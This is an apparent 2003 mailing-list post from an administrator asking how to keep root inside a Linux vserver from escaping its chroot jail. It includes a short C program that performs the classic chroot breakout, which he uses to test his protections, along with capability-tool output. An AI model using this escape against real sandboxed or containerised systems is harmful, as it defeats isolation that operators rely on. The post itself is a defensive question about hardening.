From: Mihai RUSU (dizzy_at_roedu.net)
Date: Tue 04 Mar 2003 - 15:00:05 GMT
Hi
I am trying to secure a chroot enviroment for vserver. Problem is that
standard chroot can be escaped very easy with a small program (if the user
has uid 0 access, if he can do chroot()).
Here is the program I use to test chroot() protection:
#include <stdio.h>
#include <fcntl.h>
int main()
{
int fd;
mkdir("bla", 0755);
fd = open(".",O_RDONLY);
chroot("bla");
fchdir(fd);
chdir("../../../../../../../../../..");
mkdir("escaped");
}
Doing standard chroot in a chroot enviroment then running this little prog
creates a "escaped" directory in the real root of the system :(
Problem is that I tried capchroot --nochroot and it does the same. Also I
have tried chcontext --secure . I was looking for help from reducecap but
it seams it doesnt remove the capability :
# reducecap --secure --SYS_CHROOT /bin/bash
Executing
# reducecap --show
...
CAP_SYS_CHROOT X X
How can make sure nobody (not even uid 0) from a vserver cannot escape its
chroot jail ?
Thanks
----------------------------
Mihai RUSU
Disclaimer: Any views or opinions presented within this e-mail are solely
those of the author and do not necessarily represent those of any company,
unless otherwise specifically stated.